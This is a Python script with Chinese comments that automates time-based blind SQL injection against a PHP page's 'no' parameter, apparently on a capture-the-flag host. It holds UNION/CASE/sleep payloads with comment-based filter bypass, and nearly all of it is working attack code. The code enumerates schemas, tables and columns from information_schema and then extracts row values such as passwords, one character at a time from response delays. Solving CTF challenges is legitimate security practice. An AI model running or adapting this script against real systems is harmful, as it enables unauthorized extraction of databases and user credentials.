脚本

# encoding:utf-8
import hashlib
import requests
import re
import time
import string

characters = string.ascii_letters + string.digits
max_length = 200
target = 'http://1eb82f8a-5494-47fc-88af-8bdd6e607c1f.node3.buuoj.cn/view.php?no='

cur_database = "-1/**/union/**/select 1,/**/(case/**/when/**/(mid((select/**/group_concat(schema_name/**/separator'@')/**/from/**/information_schema/**/./**/schemata)/**/from/**/{0}/**/for/**/1)='{1}')/**/then/**/sleep(4)/**/else/**/1/**/end),3,4-- -"


def get(payload):
    flag = ''
    for i in range(1, max_length):
        next_position = False
        for char in characters+"_{}#-%();:":
            payload_ = payload.format(str(i), char)
            print("payload为：%s"%payload_)
            try:
                r = requests.get(target+payload_, timeout=3)
                r.encoding = 'utf-8'
                #print("响应为:%s"%r.text)
                time.sleep(0.1)
            except requests.exceptions.ReadTimeout:
                flag += char
                print(flag)
                next_position = True
                break
        if not next_position:
            return flag


# 指定数据库，获取其下全部表名
def get_table(database):
    for i in range(0,5):
        print("正在查询数据库" + database + "中的表")
        payload = "-1 union/**/select 1, (case when (substring((" \
                 "select table_name from information_schema.tables where table_schema='"+ database + "' limit 1 offset "+ str(i) +") " \
                 "from {0} for 1)='{1}') " \
                 "then sleep(4) else 1 end),3,4-- -"
        table = get(payload)
        print( "数据库" + database + "的第"+ str(i+1) +"个表"+table)
        get_col(table)

        if not table:
            print('数据库'+database+'中的表查询完毕')
            break

# 查字段
def get_col(table):
    columns = "";
    for i in range(0, 5):
        print("正在查询表" + table + "中的字段")
        payload = "-1 union/**/select 1,( case when (substring((" \
              "select column_name from information_schema.columns where table_name='"+ table +"' limit 1 offset "+ str(i) +") " \
              "from {0} for 1)='{1}') " \
              "then sleep(4) else 1 end),3,4-- -"
        column = get(payload)
        print("表" + table + "的第" + str(i+1) + "个字段为" + column )
        # print(column)
        columns+=column+'   '
        if not column:
            print("表" + table + "中的字段查询完毕   " + columns)
            break


# 作为单独的模块使用吧,获取字段详细信息
def result(column, table):
    for i in range(0, 5):
        payload = "-1'and (select case when (substring((select "+column+" from "+table+" limit 1 offset " + str(i)+ ") from {0} for 1)='{1}') " \
          "then sleep(4) else 1 end) #"
        print(get(payload))


if __name__ == "__main__":
    #database1 = get(cur_database)
    table1 = get_table('fakebook')
    #result("password", "user")